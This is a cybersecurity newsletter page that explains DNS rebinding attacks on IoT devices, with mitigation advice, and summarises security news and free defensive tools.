Inside Security | Inside

[ Inside Security ]

David Strom's in-depth cybersecurity news and analysis

DNS rebinding is a little-known technique which has become an increasingly popular exploit. It can turn a victim’s browser into a proxy for attackers, who can change the IP address associated with a domain name after it has been used. It solves a way for attackers to operate behind a network firewall or DHCP server without any restrictions, and users could inadvertently load malware because they think they are browsing a safe website when it isn’t.

Back when the web was relatively new, engineers decided to create what is called the same origin policy. This means that when your browser requests a page on a particular website, only resources that are located on that domain can be served back. That sounds good, until you bring DNS into the picture. DNS translates IP address numbers into the familiar domain names that we usually type into our browsers. The same origin policy was set up for these names, not for IP addresses. What if you could fool the browser into thinking that a malicious website was really using the same domain when it was actually using a different domain coming from a faulty DNS server? That is at the heart of DNS rebinding.  

So who should worry? Virtually every model of Google Home, Chromecast, Sonos Wi-Fi speakers, Roku streaming devices, and some smart thermostats are vulnerable to this attack, and you could imagine numerous other IoT devices as well. This is a big deal. The attack isn’t so simple to implement, but it can be done and will become more popular.

This article from Craig Young at Tripwire explains how the attack works in theory. He says, “As of now, IoT attack campaigns have been quite successful attacking only publicly exposed devices, but it is only a matter of time before there is too much competition for this low-hanging fruit. Botnet operators will then seek out better techniques for reaching valuable targets on private corporate and home networks.” Young was the source of Brian Krebs story that I cited on Tuesday.

The technique has been around for a decade, but you probably haven’t heard of it (see one completely unscientific sample in the screenshot below). And more recently, a series of attacks have used it, such as Blizzard’s video games, the Transmission torrent client, and several Ethereum cryptocurrency wallets.

Another article by Brandon Dorsey has independently tested a variety of IoT devices and shows you various proofs of concept with Sonos speakers and other smart home devices. To create the attacks, “You have to spin up a malicious DNS server in the cloud, write some custom JavaScript payload targeting a specific service, serve that to a victim on a target network, and then figure out how to use their web browser to pivot to a target machine running that service, which you probably don’t know the IP address of.” As I said, a lot of work but the payoff could be huge.

Both Dorsey and Young have been in touch with the major IoT device vendors, who say they are working on fixes. But what can you do to protect yourself in the meantime? First, reconfigure your home router with a better DNS source, such as OpenDNS or the Cloudflare server. And make sure your browsers are at their most recent patch levels. If you are a developer, add host header validation to your web server. Finally, both Dorsey and Young’s posts have links to various testing tools that can be used to test your code for the vulnerability, along with Tavis Ormandy and his Simple DNS Rebinding Service.

I have been following the evolution of digital Estonia for several years and signed up as an eResident last year. In this week’s podcast for Security Ledger, Paul Roberts interviews Taavi Kotka and his four years as the CIO for Estonia. Kotka talks about his accomplishments, including putting various government services online such as voting. Two things you can’t do digitally in Estonia: get married and divorced. (Denmark has had digital divorces for some time, although they are making it somewhat more difficult next year.) Worth a listen.

-- David Strom, editor of Inside Security

1.  Another decades-old flaw has been found in several PGP-related clients. Called SigSpoof, it allows hackers to spoof a digital signature and was discovered last week by a researcher. The flaw is present only when using the setting called verbose, which is used to troubleshoot bugs or unexpected behavior. None of the vulnerable programs enables verbose by default. – ARS  

Subscribe to Inside Security

Many thanks to Inside Security's corporate supporters.  Please go check them out!


Endgame's endpoint security platform protects the world’s largest organizations from targeted attacks, eliminating the time & cost associated with incident response. Learn more


Nok Nok Labs has the ambition to transform authentication, by unifying it into one standard protocol, giving business the control they need. Learn more


2. There is new research (the link will take you to a sceencast demonstration) about a vulnerability with Google Home or Chromecast devices. It shows that Web sites can run a simple script in the background that collects precise location data on people who have these installed anywhere on their local network. The attack works by asking the Google device for a list of nearby wireless networks and then sending that list to Google’s geolocation lookup services. Google is working on a fix, after initially refusing to acknowledge the researcher’s report. – KREBS ON SECURITY

3.  Microsoft has patched a major vulnerability in Windows 10 that could allow anyone to break into your computer just by issuing voice commands to Cortana. Here are the published technical details of the flaw, along with a step-by-step proof-of-concept video tutorial. Before the patch, you could also use Cortana to obtain confidential data on a PC. Time to update!

4. Gal Vallerius, a 36-year-old French national pleaded guilty this week in the U.S. of selling narcotics on the Dark Web under the nickname of OxyMonster. US authorities arrested Vallerius at the Atlanta airport in September after he arrived in the U.S. to attend and participate in the World Beard and Mustache Championships.  He was found by authorities tracing a Bitcoin-based “tip jar” he used, and his laptop connected him with his crimes. Other dark web criminals use some sort of anonymizing service to hide their identities. Vallerius could face 20 years behind bars.– BLEEPING COMPUTER

5. And in other legal actions, a Belgian man was found guilty of a 16-month campaign of harassment against an author who’s known for campaigning against racism. The man’s identity wasn’t released but between January 2015 and April 2016 the author was attacked on Twitter several times by the same account, @Kafirbrigade. Twitter provided law enforcement with his IP address. My colleague Lisa Vaas tells the story. – NAKED SECURITY (SOPHOS)

6.Here is an informative post that reviews a very subtle AWS privilege escalation method and what you can do to protect yourself against it. It starts with creating new policies that can be tweaked. It isn’t a simple process. Rhino has written an open source program called aws_esclate that you can download here to scan your VMs for exploits. – RHINO SECURITY BLOG

7. Two new Android malware families have been discovered. First is MysteryBot. It packs a banking trojan, keylogger, and ransomware into a single package. It operates on both Android v7 and v8 devices by using a reliable way to time its overlay screens and show them when the user opens and brings an app into the foreground. ThreatFabric researchers say MysteryBot appears to be related to the well-known and highly popular LokiBot trojan. -- FOSSBYTES

Second is HeroRat. It leverages Telegram messaging. It has been spreading since at least August 2017. In March 2018, its source code was made available for free on Telegram hacking channels, and as a result, hundreds of parallel variants of the malware have been circulating in the wild. Attackers lure victims into downloading the RAT by spreading it under various attractive-sounding guises, via third-party app stores, social media and messaging apps. – WE LIVE SECURITY (ESET)

8.  Joshua Adam Schulte once created malware for both the CIA and NSA to break into adversaries' computers. He was indicted Monday by the Department of Justice on 13 charges of allegedly stealing and transmitting thousands of classified materials. The claim is that he was the mastermind behind the Vault 7 leaks. Schulte had been charged last year in New York with possession of child pornography. -- NYTIMES

9. If you have heard about a Chrome security extension from the startup Paladin, move on. Turns out they are selling snake oil, and the extension is close to worthless. This report goes into why and how the devil is in the technical details. -- ZDNET

10. Researchers employing machine learning algorithms have discovered an enormous certificate signing abuse by BrowseFox, a marketing adware plugin that illicitly injects pop-up ads and discount deals. The plugin may be exploited by threat actors by corrupting ads to lead victims to malicious sites and unknowingly download malware. This post takes you through the details of how it works.– TREND MICRO BLOG

Why not try to figure out a career that can encompass all three at the same time?  -- FACEBOOK

I have put together my top ten recent stories (in order from my most to least favorite) about various tools that defenders can use to protect their networks and endpoints. All of the tools mentioned here are free or minimal cost. Some of these posts are a sequence of articles, so there is a lot to review and learn from here. Don’t worry, there are plenty of exploits to cover and I will do so in tomorrow’s newsletter.

-- David Strom, Editor of Inside Security

Here are an excellent series of posts from Varonis on various ways to detect hidden malware. The author calls it Living off the Land, in which hackers reuse less well-known Windows utilities to hide script payloads and cloak other activities. It now has three articles: First is an intro to Regsvr32, which allows for JScript or VBScript to be injected into DLLs. Part 2 covers MS HTA, which began life many years ago as a useful development tool that allowed IT people to leverage HTML and JavaScript or VBScript to create webby apps. Now it still lies in the Windows/System32 folder and hackers have been taking advantage of it. Part 3 covers Certutil, another Windows utility that is used to display CA info but also can be exploited.

2. Here is a collection of tools that can be used to understand the internal workings of .NET, such as PerfView and SharpView. While not strictly security tools, they can all help you debug your code and find vulnerabilities. – MATT WARREN BLOG

3. Here are some tips on how to improve your web app security from a developer’s perspective. While many developers claim that security can make apps harder to use and to test, that isn’t the case. The author suggests starting from a position of understanding how much effort is going into stopping an intruder and then drawing an appropriate line in the sand, or the code, as the case may be. – DZONE

4. Only half of devops teams integrate application security testing elements in their workflows, according to a new survey. Respondents cited a lack of automated security testing tools, lots of false positives to track down, and other excuses. The post talks about how IT can approach secure devops and invest in more and better security practices. – SECURITY INTELLIGENCE BLOG (IBM)

5. If you were a fan of the Renesys-based Internet Intelligence Map, Oracle has purchased its assets and will continue the practice. You can read my 2014 review of the service in Network World here. The map offers data about ISP outages around the world, showing where potential trouble spots are happening. It has two sections: Country Statistics and Traffic Shifts. – ORACLE BLOG

6.  Here is another series of posts about understanding malicious PowerShell scripting techniques that are often used by hackers. The first blog post walked through how to find malicious PowerShell scripts in the System event log, and the various steps to decode them. The second post discusses how the Windows Registry can be another location where malicious PowerShell scripts might be hiding. Both are from Mari DeGrazia’s Another Forensics blog.

load more stories